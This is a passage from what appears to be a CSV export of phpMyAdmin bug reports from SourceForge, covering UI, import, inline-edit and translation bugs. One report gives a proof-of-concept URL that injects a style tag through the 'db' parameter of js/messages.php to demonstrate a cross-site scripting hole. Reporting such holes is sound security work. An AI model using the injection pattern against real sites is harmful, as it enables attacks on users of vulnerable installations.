Go to that table Insert some rows Search and browse tabs still suggest that the table is empty Also there are many PHP errors and notices on nearly every tab Original URL https sourceforge.net p phpmyadmin bugs 3350 Original author roccivic Found in version Latest Git","bug"
"24444","9598","URL redirector under setup.
Links to wiki do not work under setup.
The fix is not just to change .
url.php to .. url.php because the person might not be and in fact is probably not) logged in and url.php needs a valid session token.
Original URL https sourceforge.net p phpmyadmin bugs 3191 Original author lem9 Found in version Latest Git","bug"
"24444","9599","Column labels off by one position.
Just updated to 3.4.3RC1 actually a git pull, so I guess officially 3.5.0 dev.
Now my first column label ie ID) sits above the column of delete links and all others are shifted one left as well.
Original URL https sourceforge.net p phpmyadmin bugs 3353 Original author adrianbj Found in version Latest Git","bug"
"24444","9600","Synchronisation and AllowArbitraryServer.
Even if AllowArbitraryServer is set to false the default), it is still possible to synchronize to other servers.
The synchronization should in this case work only for servers defined in configuration.
Original URL https sourceforge.net p phpmyadmin bugs 3194 Original author nijel","bug"
"24444","9601","PHP error on PDF schema export.
Notice in .
libraries tcpdf tcpdf.php 8769 Undefined offset 0 Backtrace .
libraries tcpdf tcpdf.php 10494 TCPDF gt; putannotsobjs ) .
libraries schema Pdf Relation Schema.class.php 342 TCPDF gt; putresources ) .
libraries tcpdf tcpdf.php 10733 PMA PDF gt; putresources ) .
libraries tcpdf tcpdf.php 3644 TCPDF gt; enddoc ) .
libraries tcpdf tcpdf.php 11445 TCPDF gt;Close ) .
libraries schema Pdf Relation Schema.class.php 1076 TCPDF gt;getPDFData ) .
libraries schema Pdf Relation Schema.class.php 931 PMA Pdf Relation Schema gt; showOutput string 3) .
.. .. .. .. 1 PMA Pdf Relation Schema gt; construct ) .
schema export.php 48 eval ) Original URL https sourceforge.net p phpmyadmin bugs 3195 Original author nijel Found in version 3.4.0","bug"
"24444","9602","Unit tests fail.
This has been a problem for some time.
Filing it now for tracking purposes.
On the idea list for the Google Summer of code there is an idea to improve test coverage, which could improve code quality.
On the devel list Kasun Lakpriya has shown an interest to this.
But we first need to get the current tests up to date and start planning what we would like to be tested and how.
Original URL https sourceforge.net p phpmyadmin bugs 3198 Original author helmo Found in version Latest Git","bug"
"24444","9603","Adding more fields fails.
When creating new table on separate page = click new table link in navigation frame), it is not possible to add more columns when ajax is enabled.
Original URL https sourceforge.net p phpmyadmin bugs 3199 Original author nijel Found in version Latest Git","bug"
"24444","9604","Returns to home when query is killed.
Execute a long running query in SQL tab.
When the query is killed from another connection), the page returns to home without any error message.
Original URL https sourceforge.net p phpmyadmin bugs 3200 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9606","cfg[Export][asfile] false does not select asText.
When customizing the Export defaults, I m trying to make the default output option View output as text by setting the cfg[ Export ][ asfile ] var to false .
However, when you do this, no export option is actually selected requiring a click on View output as text .
My expectation would be that if cfg[ Export ][ asfile ] is set to false , View output as text would be selected by default.
Original URL https sourceforge.net p phpmyadmin bugs 3359 Original author sstringer Found in version 3.4.2","bug"
"24444","9607","Missing Privileges menu tab.
After the first login cookie auth type) with a privileged account, the Privileges main menu tab is not displayed.
However should you log out and log in, now you see it.
Original URL https sourceforge.net p phpmyadmin bugs 3202 Original author lem9 Found in version Latest Git","bug"
"24444","9608","Copy feature in vertical mode.
The new Copy link does not show up in vertical mode.
Original URL https sourceforge.net p phpmyadmin bugs 3206 Original author lem9 Found in version Latest Git","bug"
"24444","9609","Table with numeric name not shown.
I can see this in latest master, however not in QA 3 3.
When there is table with numeric name, for example CREATE TABLE IF NOT EXISTS `1` `asd` int 11) NOT NULL, `gf` int 11) NOT NULL, `xvyc` int 11) NOT NULL, `4qwer` int 11) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=latin1; it is not shown in database structure.
It is however properly displayed in navigation frame.
Original URL https sourceforge.net p phpmyadmin bugs 3208 Original author nijel Found in version Latest Git","bug"
"24444","9610","AJAX dialogs use wrong font size.
I already brought this up on the mailing list, but it must have slipper through the cracks.
Anyway, in phpmyadmin themes sometheme jquery jquery ui 1.8.custom.css at line 50 a font size of 1.1em is defined for AJAX dialogs.
But this makes the content occupy more space than necessary in the dialogs.
So I suggest that this value is changed to 1em.
Original URL https sourceforge.net p phpmyadmin bugs 3363 Original author roccivic Found in version 3.4.3","bug"
"24444","9611","Import csv not working pma.3.4.3.
Hi, using the csv import option in pma version 343 is not working.
I tested all versions of 3.4 and I could not make it work.
Import of csv is working with version 3.3.9 with no problems.
I m using windows XP SP3, Apache 2.1.11 win32), Php 5.3.2 and MySQL client version mysqlnd 5.0.7 dev 091210 Revision 294543 I m attaching a zip file qieth the following; Alias.20110703.csv, just 3 records.
Alias.Table.Format.csv, the table format by pma PMA.Ver339.Import.Settings.png, image showing the import settiongs in Pma.339 PMA.Ver339.Import.Results.png, image showing the import results in Pma.339 PMA.Ver3431.Import.Settings.png, image showing the import settiongs in Pma.339 PMA.Ver3431.Import.Results.png, image showing the import results in Pma.339 Thanks beforehand for your reply to this bug Original URL https sourceforge.net p phpmyadmin bugs 3364 Original author yacar suscri Found in version 3.4.3","bug"
"24444","9612","Troubles with charset in 3.4.0beta 3. good screenshot from version 3.3.9 bad screenshot from 3.4.0 Original URL https sourceforge.net p phpmyadmin bugs 3209 Original author anonymous Found in version 3.4.0","bug"
"24444","9613","Link Option does not work.
I don t know whether it is a bug or error in setting.
If I click the view) option link, the options are not displayed.
JavaScript is enabled in my browser, using the same browser I can access this link on another phpMyAdmin, which is running on other maschine.
phpMyAdmin 3.3.10deb1 Apache 2.2.17 Ubuntu) MySQL Client Version 5.1.54 any ideas?
Original URL https sourceforge.net p phpmyadmin bugs 3367 Original author anonymous Found in version 3.3.10","bug"
"24444","9614","Losing SQL history.
I am testing this with cfg[ QueryHistoryDB ] set to true.
If I open the SQL query window I see the previous queries normally in the SQL history.
Now if I close the query window, then browse a table or enter a query in a SQL query box, when I go back to my SQL history I only see recent queries typed in this session).
After a logout and login, I see in my history all my previous queries plus the ones I just tried in my test.
Original URL https sourceforge.net p phpmyadmin bugs 3210 Original author lem9 Found in version Latest Git","bug"
"24444","9615","Inline edit fails on some tables.
When trying to inline edit sakilla.films, I get following js error and nothing is saved Chyba value is undefined Zdrojovxc3xbd soubor js sql.js xc5x98xc3xa1dek 643 Tested with both HEAD and 3.4.0 beta3.
Original URL https sourceforge.net p phpmyadmin bugs 3211 Original author nijel Found in version Latest Git","bug"
"24444","9616","Inline edit not accessible in some cases.
Inline edit is not accessible on some pages even when it should.
Reproduce 1\.
browse random table 2\.
edit random row not inline edit) 3\.
save it without changes You now have virtually same page as in step 1, but inline edit links are not there.
Original URL https sourceforge.net p phpmyadmin bugs 3212 Original author nijel Found in version Latest Git","bug"
"24444","9617","Inline edit fails for foreign keys.
When editing foreign key, inline edit just shows empty select for it instead of value.
This might be actually cause of bug 3184827 , in case it is, this one should be closed as duplicate.
Original URL https sourceforge.net p phpmyadmin bugs 3213 Original author nijel Found in version Latest Git","bug"
"24444","9618","With Suhosin, urls are too long in edit links.
With phpMyAdmin 3.4 the table modification page uses URL s instead of a lt;form method= POST gt; this causes many problems with tables that have large fields in them because it causes the url to be longer than allowed.
Revert to using a lt;form instead of an href please, or at least make it be an option.
Original URL https sourceforge.net p phpmyadmin bugs 3373 Original author tailcat Found in version 3.4.3","bug"
"24444","9619","XSS vulnerability in js messages.php.
Based on a scan by McAfee Hacker Safe there is a XSS Cross Site Scripting) Vulnerability in the js message.php file.
This can be seen by using the link below as it applies to your phpMyAdmin Installation.
The value for GET[ db ] needs to be cleaned before it is returned as output.
Example js messages.php?lang=en db= gt; gt; lt;style gt;body\{text decoration blink\} lt; style gt; collation connection=utf8 general ci token=55bd085899c4b93212c94e76fb48d1c0 Result PMA messages[ strBLOBRepositoryDisableAreYouSure ] = Are you sure you want to disable all BLOB references for database gt;\\\ gt; lt;style gt;body\{text decoration blink\} lt; style gt;?
; Original URL https sourceforge.net p phpmyadmin bugs 3375 Original author justinmbug Found in version 3.4.3","bug"
"24444","9620","no window with the confirmation.
yeaterday git revision 3.4beta4 dev After running a query to update for example, runs a yellow strip of Ajax, but no confirmation that the request did not.
No information, how many lines updated and carried out a general request or not.
Although changes to the database are made.
In screemnshot window after press Ok button and after the appearance and disappearance yellow ajax line Original URL https sourceforge.net p phpmyadmin bugs 3215 Original author anonymous","bug"
"24444","9621","Dropdown not displayed for enums.
Under inline edit mode, a text field is displayed to edit the enum fields.
Instead, a dropdown should be displayed to select the value.
Original URL https sourceforge.net p phpmyadmin bugs 3217 Original author madhuracj Found in version Latest Git","bug"
"24444","9622","Dropdown not displayed for foreign keys.
When inline editing a raw, if the current value for a foreign keyed field is NULL, the drop down to select the foreign value is not displayed.
When the value is not NULL it functions without any problem.
Original URL https sourceforge.net p phpmyadmin bugs 3219 Original author madhuracj Found in version Latest Git","bug"
"24444","9623","Double query box shown.
As reported by Isaac Bennetch Main page, click SQL Enter query as below CREATE USER query ; GRANT USAGE ON .
TO query ; [end query] click go the page returned shows this in the query box, already revealed CREATE USER query ; MySQL returned an empty result set i.e.
zero rows).
GRANT USAGE ON .
TO query ; MySQL returned an empty result set i.e.
zero rows).
[end results] Above this query box is the Show query box link, clicking it reveals the original query.
Original URL https sourceforge.net p phpmyadmin bugs 3220 Original author lem9 Found in version Latest Git","bug"
"24444","9624","Form validation and submission.
When using Create table either from navigation panel or main panel, when there are validation problems for example a missing column name or table name) the form is submitted too soon but stays on screen).
Original URL https sourceforge.net p phpmyadmin bugs 3221 Original author lem9 Found in version Latest Git","bug"
"24444","9625","Panel following a table operation.
As reported by Thilanka Kaushalya In Table operations Move Table , Copy Table, Table Maintenance reloads and does not auto get back to the Table Operations tab.
Do we require fully reload of the page or instead of that we can show the sql execution results in the same tab as in Alter table oder by and Table options Stay in the same tab after the execution).
Original URL https sourceforge.net p phpmyadmin bugs 3222 Original author lem9 Found in version 3.3.9","bug"
"24444","9626","drop table still shows error after completion.
after creating a table with some errors, if you drop the table using the link Drop , it still displays an error, Unknown table test , although the table as such has been dropped from the database.
Original URL https sourceforge.net p phpmyadmin bugs 3223 Original author onebighack Found in version 3.3.9","bug"
"24444","9627","Inline edit break foreign value hyperlink.
Inline edit a text field which is foreign keyed.
Even though clicking on the new value is suppose to select that value from the foreign table, an SQL error is shown instead.
From the SQL error it seems that the problem is due to missing quotes in the SQL query.
Original URL https sourceforge.net p phpmyadmin bugs 3224 Original author madhuracj Found in version Latest Git","bug"
"24444","9628","DB specific privileges and Ajax.
Found these issues 1\.
check all uncheck all does not work 2\.
when a privilege is changed and saved, the User overview panel shows wrongly this privilege in the list of global privileges but it s not really there as can be proved by reloading the page) Original URL https sourceforge.net p phpmyadmin bugs 3225 Original author lem9 Found in version Latest Git","bug"
"24444","9629","Partial list of users and new user.
In the user overview, I click on a initial, for example R, and the usernames starting with R are displayed.
Now I create user toto and it gets listed among the R users.
Original URL https sourceforge.net p phpmyadmin bugs 3226 Original author lem9 Found in version Latest Git","bug"
"24444","9630","Error when edit record with geometry.
The following problem is still happening in phpMyAdmin 3.3.9.2, even though it was claimed to be fixed in bug ID 3038193.
If a table has a geometry column the error always occurs when saving edited record.
phpMyAdmin seems to think the geometry value has changed when it has not.
This may occur with any blob.
Needs to just ignor geometry column.
Original URL https sourceforge.net p phpmyadmin bugs 3227 Original author anonymous Found in version Latest Git","bug"
"24444","9631","no uid Query results export Suhosin limit).
steps 1\.
execute SELECT with LEFT JOIN 2, scroll down and press Export in Query results operations block result export dialog for primary table, not for query result Original URL https sourceforge.net p phpmyadmin bugs 3389 Original author sailormax Found in version 3.4.4","bug"
"24444","9632","bug in csv import functionality.
Hi, I have come across what may potentially be a bug in the csv import functionality of the phpmyadmin version 3.3.9.
I have a tab delimited file.
No major problems there, I just fill in the proper values in the import section and all should be well.
The problem is that even with the proper field termination values input, the import script is failing due to the fact that it is not picking up any of the field names even though they do indeed exist.
I have tested the file with another import tool and it imports fine so I am certain that this error is specific to the phpmyadmin installation.
Any thoughts on this or has anyone else encountered it.
Here is the error message.
SQL query CREATE TABLE IF NOT EXISTS `boneill data`.`TABLE 1` ) ENGINE = MYISAM DEFAULT CHARACTER SET utf8 COLLATE utf8 general ci; MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) ENGINE=MyISAM DEFAULT CHARACTER SET utf8 COLLATE utf8 general ci at line 1 You can see the problem, there are no field names between the brackets as phpmyadmin is not detecting them.
Any thoughts are appreciated.
I have further confirmed this problem by saving the text file as an open document spreadsheet.
I then tried to import the open document spreadsheet and it came in fine.
This further supports the possibility of it being a big in the csv import functionality.
Regards, Barry.
Original URL https sourceforge.net p phpmyadmin bugs 3228 Original author anonymous Found in version 3.3.9","bug"
"24444","9633","Creating table with error does not show.
Go to create table, choose one enum field and enter invalid choice for enum eg foo , bar without ending quote).
After submit there is no feedback that something is wrong and table is of course not created.
Original URL https sourceforge.net p phpmyadmin bugs 3229 Original author nijel Found in version Latest Git","bug"
"24444","9634","Hiding Inline edit problematic for foreign keyed fields.
Consider the following scenario Click Inline Edit of a raw where there is a foreign keyed fields.
Then click Hide to discard any changes.
You have lost the links the foreign values which were originally there.
Now if you click again on Inline Edit you lose the values of foreign keyed fields and trying to save without any changes cause errors.
Original URL https sourceforge.net p phpmyadmin bugs 3232 Original author madhuracj Found in version Latest Git","bug"
"24444","9635","Hiding inline edit problematic for text geometry blob fields.
Consider the following scenario Click Inline Edit of a raw where there is a field that does not support inline editing eg text, blob, geometry).
Then click Hide to discard any changes.
The value of the field will be completely hidden upon clicking Hide .
You can view this behavior for field description in table film of sakila database on demo server.
Demo server http demo.phpmyadmin.net master config ?server=1 Original URL https sourceforge.net p phpmyadmin bugs 3233 Original author madhuracj Found in version Latest Git","bug"
"24444","9636","Second click on Inline Edit.
I uncovered a problem with the new Save hide code, here is the scenario click on Inline edit for a row click on Save for this row click again on Inline edit the link did not change to Save Original URL https sourceforge.net p phpmyadmin bugs 3234 Original author lem9 Found in version Latest Git","bug"
"24444","9637","Multi table operation after table create.
Due to a wrongly generated checkbox id, I cannot do a multi table operation that includes a newly created table.
Original URL https sourceforge.net p phpmyadmin bugs 3235 Original author lem9 Found in version Latest Git","bug"
"24444","9638","Synchronizing tables without PK.
See https sourceforge.net projects phpmyadmin forums forum 72909 topic 4394700 Original URL https sourceforge.net p phpmyadmin bugs 3236 Original author lem9 Found in version 3.3.7","bug"
"24444","9639","Multiple Change Password Windows.
When I click on Change Password button each time a new Change Password window is created and in the newly created windows after the original window) there is no Generate Password field in them and at the same time a new Generate Password field is being added to the original Change Password window.
And since the new windows are being created on top of the original one I can t see the Generate Password field in them.
\ Here are some screen shots what I am getting, After clicking several times http i.imgur.com bX0HX.png Original window looks like this http i.imgur.com M3JZo.png Original URL https sourceforge.net p phpmyadmin bugs 3237 Original author kasunlak Found in version Latest Git","bug"
"24444","9640","Continue insertion and some column types.
The continue insertion feature, with Ajax enabled configuration, has problems with some column types ENUM the default value is not set all kinds of DATE columns the date picker does not show up, or if it shows up, the picked date is not copied to the correct field Original URL https sourceforge.net p phpmyadmin bugs 3239 Original author lem9 Found in version Latest Git","bug"
"24444","9641","mb detect encoding doesn t exists.
mb detect encoding is part of the mbstring extension, which is not installed by default.So if one havent compiled his php with enable mbstring option ,while configuring phpMyAdmin he will face this error and may also wonder what is actually going wrong as php doesn t flags any error on the browser in most of the cases) This is really a serious bug as if someone doesnt have admin privileges he wont be able to do anything .
Original URL https sourceforge.net p phpmyadmin bugs 3240 Original author sha26","bug"
"24444","9642","Delete records from last page breaks search.
phpmyadmin version 3.4.3.2 Firefox 5.0.1 Demo table at http demo.phpmyadmin.net database steverogers7 table searchpageproblem 1\.
use Search on table searchpageproblem, myflag=1 to display multiple pages 2\.
go to the last page 3\.
delete all the records on that page so that they no longer appear in the search.
4\.
Search screen now displays \ MYSQL returns an empty result set \ the query SELECT FROM searchpageproblem WHERE myflag=1 with no limit CLAUSE \ no forward backward page buttons even there are still rows in the table.
5\.
Browse shows all the records 6\.
Search again on the same field myflag=1) shows Empty result set 7\.
Search on a different field eg, field2=4) lists records correctly 8\.
Search again on myflag=1) still shows Empty result set 9\.
Search on both myflag=1 AND field2=4) shows results correctly 10\.
Search again on myflag=1) still shows Empty result set Workaround either 11\.
Add a couple of records to the table so that the original search flows into an extra screen or 12\.
Edit a search query eg SELECT FROM searchpageproblem WHERE myflag=1 then all searches work ok again.
Sorry in advance if this is my fault!
Original URL https sourceforge.net p phpmyadmin bugs 3404 Original author steverogers7 Found in version 3.4.3","bug"
"24444","9643","Inline edit and Relational display column.
Inline edit works correctly with a row having a foreign key, when the display Option is relational key .
But when it s relational display column , we lose the current value of the column in the dropdown list.
Original URL https sourceforge.net p phpmyadmin bugs 3241 Original author lem9 Found in version Latest Git","bug"
"24444","9644","XML import doesn t recognise utf8.
1\.
When database or table with data in utf8) is exported as an XML file and later imported via PMS the multi byte characters in utf8 are not correctly imported in MySQL.
I tryed this action on my installation and also on demo server http wiki.phpmyadmin.net pma Demo server) and got the same result ... 2\.
Even though the export in XML was done on the same server with rather small DB 10MB) the XML file has to be divided in many parts if you want to import the data back to MySQL via PMA.
Probably the PHP and PMA upload and session thread settings were not correct the upload limit in php is 32MB and memory limit 128MB, but I can t don t know how to extend 128MB limit) but there is not an exact help how and what you should set up ...
Original URL https sourceforge.net p phpmyadmin bugs 3242 Original author anonymous Found in version 3.3.9","bug"
"24444","9645","PHP error on ODS import.
Jus collected from demo server logs, don t know how to reproduce PHP Fatal error Call to a member function children ) on a non object in libraries import ods.php on line 77 012 Original URL https sourceforge.net p phpmyadmin bugs 3243 Original author nijel Found in version Latest Git","bug"
"24444","9646","Thrown to login screen on attempting to submit inline SQL.
Steps 1\.
Login using preconfigured db login details stored in config, one of several databases configured) 2\.
Browse any table on my database 3\.
Click the inline link to edit the SELECT statement 4\.
Click go 5\.
Login screen appears stating No activity within 1440 seconds; please log in again 6\.
Upon relogging in, presented with this error message on screen import.php Missing parameter import type import.php Missing parameter format Original URL https sourceforge.net p phpmyadmin bugs 3411 Original author anonymous Found in version 2.11.9","bug"
"24444","9647","No feedback when result is empty, signon auth type.
1\.
Select a database and a table within that database 2\.
Click the SQL tab 3\.
Run a valid SQL query that will return no results SELECT FROM table WHERE id=99999) 4\.
Notice Loading message is displayed, then fades out with no indication if there was an error or if the query was successful.
JSON response displays empty result set message, but nothing is displayed on screen.
OSX 10.7 Safari 5.1 phpMyAdmin 3.4.4 MySQL client version 5.0.51a MySQL Server version 5.1.49 3 Original URL https sourceforge.net p phpmyadmin bugs 3412 Original author pb30 Found in version 3.4.8","bug"
"24444","9648","User prefs and Iconic settings.
In 3.4.0 beta4, these settings Settings Main Frame Browse Mode Iconic navigation bar = Yes Iconic table operations = Yes produce the same effect as if they were set to both .
Original URL https sourceforge.net p phpmyadmin bugs 3244 Original author lem9 Found in version Latest Git","bug"
"24444","9649","DB specific privileges won t submit.
When trying to set Database specific privileges for a user, the form works correctly when using the drop down menu to select a database.
When using the input field however, the new form won t load when pressing submit.
Reproduce log in to phpmyadmin = gt; go to privileges = gt; edit a user = gt; enter something in the text field in the Database specific privileges form = gt; press Go = gt; Watch firebug net tab to see that the page is submitted and returned but never displayed.
Firebug shows me that the request is made en html is returned, the form just isn t displayed.
Tested with 3.4.4 and 3.5 development in Firefox 7 Beta and IE 9 Original URL https sourceforge.net p phpmyadmin bugs 3415 Original author joolee Found in version 3.4.4","bug"
"24444","9650","Inline edit not updating timestamp on screen.
When using Inline Edit on a row, a column that is of type TIMESTAMP and is set to on update CURRENT TIMESTAMP does not get the current stamp after saving.
Using regular Edit works correctly.
Attached screen shot of table structure.
Tested with Latest Git PHPMyAdmin Firefox 3.6.15 Chrome 10.0.648.133 MySQL 5.1.36 PHP 5.3.0 Original URL https sourceforge.net p phpmyadmin bugs 3245 Original author mikehomme Found in version Latest Git","bug"
"24444","9651","Edit utility can not handle VARCHAR column data with \r.
HI, I m using phpMyAdmin in HostMonster.com.
Here is some version information PHP version 5.2.16, MySQL version 5.1.47 community log, phpMyAdmin 3.3.8.1.
I have a table that has a varchar column.
The data in this column contains many lines, or has r or newlines characters.
The edit utility for varchar has only one line text to show the data, not a textarea that can handle multi lines.
Everytime when I use the edit utility, the r or newline character got chopped.
I saw a similar bug report opened in 2002, but then deleted with out any solutions.
Thanks Jim Bao Original URL https sourceforge.net p phpmyadmin bugs 3246 Original author jimbao","bug"
"24444","9652","French translation in server privileges.php.
The second column displays Serveur in place of something like IP ou Nom du Client .
This is a huge translation issue of the English word Host that can be either the server or the client.
In MySQL this column represents a client host IP or name), as we can see in the online documentation at http dev.mysql.com doc refman 5.0 en privilege system.html The MySQL privilege system ensures that all users may perform only the operations permitted to them.
As a user, when you connect to a MySQL server, your identity is determined by the host from which you connect and the user name you specify.
When you issue requests after connecting, the system grants privileges according to your identity and what you want to do.
... the host from which you connect .
This is the same in the French documentation at http dev.mysql.com doc refman 5.0 fr privileges.html l utilisateur joe qui se connecte depuis office.com n est pas forcxc3xa9ment la mxc3xaame personne que joe qui se connecte depuis elsewhere.com ... depuis This is a common mistake because what is often used is localhost , or and this stands for both significations of the word host .
Morover, hxc3xb4te in French is more often the client than the server Du latin hospxc4xadtem, accusatif de hospes xc2xab celui qui est rexc3xa7u, lxe2x80x99invitxc3xa9, le voyageur xc2xbb et plus rarement xc2xab celui qui rexc3xa7oit xc2xbb).
at http fr.wiktionary.org wiki h C3 B4te) and host in English is more often the server than the client Host or hosts may refer to a person who provides hospitality at http en.wikipedia.org wiki Host) so my advice is to avoid the word in English as in French, and use Client in English and in French.
Or Client IP or Name the hostname) and IP ou Nom du Client for this column.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 3248 Original author thomasgodart Found in version 3.3.8","bug"
"24444","9653","Inline Edit SQL syntax error 1064.
Inline Edit on a row with a comma separated value list in a field returns 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 60alias 60.
60alias 60 3D 27cacti risq 27 at line 1 With Firefox 3.6.12 and Internet Explorer 8.0.6001.18702 PHPMyAdmin 3.4.0 rc1 dev Original URL https sourceforge.net p phpmyadmin bugs 3250 Original author beyonder79 Found in version Latest Git","bug"
"24444","9654","Incorrect mapping of the table operations page.
You must be add clear both for warning block of the table operations page.
A screenshot must be seen in attached file.
Sorry for my English...
Original URL https sourceforge.net p phpmyadmin bugs 3251 Original author popsul Found in version 3.3.7","bug"
"24444","9655","Delimiter field in query will switch back to default.
When entering a stored procedure in the Run SQL query textarea, you will want to remove the delimiter character for the procedure to parse properly.
See screenshot).
Even if you remove it, the default delimiter character will snap back into place after you submit the query.
This is unexpected and counter intuitive.
Steps to reproduce 1\.
Go to SQL tab 2\.
Empty the delimiter field 3\.
Enter an invalid query and submit it 4\.
After submission, an error message will appear and the delimiter will be back to ; .
Expected behaviour The delimiter should remain empty.
Original URL https sourceforge.net p phpmyadmin bugs 3252 Original author pekkagaiser Found in version 3.3.9","bug"
"24444","9656","Can t add a new user.
There is an issue with the patch 3246887, When you click on the Create user button.
the form doesn t react.
This is because the form has a random ID and so the line var form = this).find addUsersForm ); l177 from server privileges.js doesn t work When I remove the modified lines from the patch, the bug 3188444 is not present So I think it would be better to remove the patch.
Patch 3246887 https sourceforge.net tracker ?func=detail aid=3246887 group id=23067 atid=377410 bug 3188444 https sourceforge.net tracker ?func=detail aid=3188444 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin bugs 3253 Original author bestben Found in version Latest Git","bug"
"24444","9657","Editing correct row when unique key missing.
phpMyAdmin 3.3.7 MySQL 5.1.41 3ubuntu12.9 log See attached sql for table structure and data Steps to recreate 1\.
Execute SELECT first name, last name FROM users; 2\.
Edit any record changing any of the shown fields Click go Save and return to the last page) Problem The sql shown to execute is UPDATE `test`.`users` SET `first name` = john WHERE `users`.`first name` = jane AND `users`.`last name` = doe LIMIT 1 ; I find this a little misleading as it s not what the would have been run.
Original URL https sourceforge.net p phpmyadmin bugs 3254 Original author anonymous Found in version 3.3.7","bug"
"24444","9658","Rare timestamps in .zip files created by zip.lib.php.
See feature request 3271770 for fix and an unrelated feature addition.
I\ ll submit a patch shortly.
This is a low priority bug that only appears when files with very old timestamps pre 1981 I think) are added to a .zip file using zip.lib.php.
An error is generated and the timestamps are written incorrectly in the .zip file, which is then a corrupt .zip file.
zip.lib.php uses this code dtime = dechex this gt;unix2DosTime time)); hexdtime = \ \\x\ .
dtime[6] .
dtime[7] .
\ \\x\ .
dtime[4] .
dtime[5] .
\ \\x\ .
dtime[2] .
dtime[3] .
\ \\x\ .
dtime[0] .
dtime[1]; eval \ hexdtime = \ \ .
hexdtime .
\ \ ;\ ); to generate what is supposed to be a four byte string in the final value in the variable hexdtime which is equivalent to the LSB first four byte integer modification time of a file in the .zip archive.
The problem is that the dechex ) function only generates as many hex characters as the unix2DosTime ) function requires, and the code requires eight bytes in the hex string represented by the initial value in the variable hexdtime.
Converting that first line to dtime = substr \ 00000000\ .
dechex this gt;unix2DosTime time)), 8); fixes this bug.
Original URL https sourceforge.net p phpmyadmin bugs 3255 Original author drbitboy Found in version Latest Git","bug"
"24444","9659","Config storage incorrect suggested table name.
Hi.
Minor issue with the instructions on the configuration storage setup page It suggests a table name of pma config but the included script uses pma userconfig .
Probably just some minor lint type issue, but without ocd style anal cross checking you d easily get it wrong.
The rest of the suggestions seem to match the script.
User preferences storage table Leave blank for no user preferences storage in database, suggested pma config setup ?page=servers mode=edit id=1 tab Server pmadb scripts create tables.sql I m using today s phpMyAdmin master latest.tar.bz2 Sean Original URL https sourceforge.net p phpmyadmin bugs 3431 Original author seanster Found in version 3.4.5","bug"
"24444","9660","Misalighed form elements when creating a new table.
Please see attached screenshot.
The form elements have different widths and alignments margins) and should be formatted more consistently.
Rouslan Original URL https sourceforge.net p phpmyadmin bugs 3256 Original author roccivic1 Found in version Latest Git","bug"
"24444","9661","Wrong frames on change LTR RTL language.
For some databases, the navigation frame switches from right to left what is wrong for RTL languages.
I can reproduce this both locally and on demo server.
Steps I used to reproduce 1\.
Import attached Aschley.sql if it does not exist.
2\.
Go to main page and choose RTL language I ve chosen Persian, but it should not matter).
Now navigation frame is on right.
3\.
Click on Ashley link in navigation frame.
And now it is on left.
Original URL https sourceforge.net p phpmyadmin bugs 3257 Original author nijel Found in version Latest Git","bug"
"24444","9662","Bad table alighment for RTL languages.
With RTL languages, the table on database table details is not aligned with arrow for mass actions.
Attaching screenshot showing it it does also show another bug for RTL I ve just filed).
Original URL https sourceforge.net p phpmyadmin bugs 3258 Original author nijel Found in version Latest Git","bug"
"24444","9663","dateformat converter produces wrong display.
text plain dateformat displays Apr 06, 2011 at 12 02 AM for the number 1302040946 date u 1302040946 shows Wed Apr 6 00 02 26 CEST 2011 The wrong display is only for the time between 0 00 and 1 00 Original URL https sourceforge.net p phpmyadmin bugs 3259 Original author anonymous Found in version 3.3.10","bug"
"24444","9664","Inline error popup back button.
If an SQL error occurs and shown in the popup, clicking the back button would take you to insert row instead of allowing you to correct the mistake.
Original URL https sourceforge.net p phpmyadmin bugs 3261 Original author tarekgalal Found in version 3.4.0","bug"
"24444","9665","Inline edit type error not considered.
If you try to save a string into a column of type INT, clicking save will tell you edit was succesful and will in fact show you the updated row.
However refreshing the table would show you a 0 since of course you can t save a string in an INT col.
Original URL https sourceforge.net p phpmyadmin bugs 3262 Original author tarekgalal Found in version 3.4.0","bug"
"24444","9666","Loading message stays on screen for too long.
When executing a query from the SQL tab is executed the Loading message stays on screen for 3 4 seconds after the response from server is displayed.
To reproduce, go to information schema s SQL tab and execute SELECT FROM information schema.tables where 0=1 Original URL https sourceforge.net p phpmyadmin bugs 3263 Original author crackpl Found in version Latest Git","bug"
"24444","9667","External link fails in 3.4.5.
I have recently upgraded to version 3.4.5 in Firefox 6 on Scientific Linux 6.1 and I notice that the Documentation link in Web server gt; PHP extension mysql does not do anything when left clicked.
However, when right clicked I am able to open the link in another tab.
After adding an external link to another part of the page, that too suffers from the same symptoms.
This only seems to have occurred in versions 3.4.x and 3.3.10 does not have this issue.
Original URL https sourceforge.net p phpmyadmin bugs 3441 Original author billmaidment Found in version 3.4.5","bug"
"24444","9668","AJAX response does not remove old contents.
I executed two queries from the SQL tab SELECT FROM information schema.tables where 0=1 I got MySQL returned an empty result set i.e.
zero rows).
, ok. Next query SELECT FROM information schema.tables Message from previous execution stays on screen, it should disappear.
Original URL https sourceforge.net p phpmyadmin bugs 3265 Original author crackpl Found in version Latest Git","bug"
"24444","9669","Navigation not refreshed after new table is created.
In previous phpMyAdmin versions after creating a new table I landed on new table s Structure tab, it doesn t happen now, I see only a popup message saying that table was created to get to table creation page, click Create table in navigation frame).
Original URL https sourceforge.net p phpmyadmin bugs 3266 Original author crackpl Found in version Latest Git","bug"
"24444","9670","Nav frame not refreshed after CREATE DROP from SQL tab.
When I have AJAX enabled and issue a CREATE TABLE or DROP TABLE query the navigation frame is not refreshed it should be.
Original URL https sourceforge.net p phpmyadmin bugs 3267 Original author crackpl Found in version Latest Git","bug"
"24444","9671","PMA sendHeaderLocation.
0 PMA sendHeaderLocation http mydns.uk.to sql tbl structure.php?db=xleech in table=peers token=04b1dfaeabc571e1c332eaf5a2e53589 sql query=SELECT 2A FROM 60peers 60 message=MySQL returned an empty result set 28i.e.
zero rows 29.
28 Query took 0.0002 sec 29) called at [ root sql.php 571] 1 require root sql.php) called at [ root tbl row action.php 148] i had 28 rows in a table called peers as you can see above i checked them all and delete them after submit, i got an empty page with this error i replaced the actual path with root mysql 5.1.41 php 5.3.2 1ubuntu4.7 you can test with the attach bellow Original URL https sourceforge.net p phpmyadmin bugs 3268 Original author cybernet2u Found in version 3.3.10","bug"
"24444","9672","Options doesn t display properly when browsing a table.
